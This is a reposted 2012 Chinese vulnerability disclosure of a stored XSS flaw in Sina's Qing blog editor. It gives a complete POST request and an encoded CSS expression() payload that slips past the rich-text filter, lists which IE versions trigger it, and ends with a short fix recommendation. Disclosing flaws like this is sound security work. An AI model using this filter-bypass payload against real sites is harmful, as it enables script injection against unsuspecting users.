IT技术互动交流平台

新浪轻博客存储型XSS漏洞

发布日期:2012-06-20 17:10:21






 

轻博客富文本过滤不严格,style属性可以插入expression代码,导致存储型XSS。
 
漏洞触发方法:
 
提交地址:http://qing.weibo.com/blog/api/artedit.php
POST数据:
domain=0&body=<div+style="x:\00%26%2354%3B5xpression(alert(/xss by cc/));">http%3a%2f%2f%22'%26gt%3baaaaaa%3c%2fdiv%3e%3cbr%2f%3e&cover=&title=%e6%ac%a2%e8%bf%8e%e6%9d%a5%e5%88%b0%e6%96%b0%e6%b5%aa%e8%bd%bb%e5%8d%9a%e5%ae%a2%22'%3easdf&privacy=0&tag=%e8%bd%bb%e5%8d%9a%e5%ae%a2&type=text&pub=null&time=1336234239000&blogid=78111bb333001c4o&release=0
 
其中关键代码为
<div+style="x:\00%26%2354%3B5xpression(alert(/xss by cc/));">
 
访问页面:www.it165.net  http://qing.weibo.com/2014387123/78111bb333001c4o.html
漏洞证明:


IE8 兼容性视图
IE7\IE6可触发
而且许多第三方双核浏览器在使用IE兼容性浏览的时候也可以触发,影响范围还是蛮大的。
 
不知道为什么IE8没触发,比较奇怪。。

修复方案:

加强富文本过滤。

作者 insight-labs
 

延伸阅读:

Tag标签: 新浪轻博客   存储型XSS漏洞  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规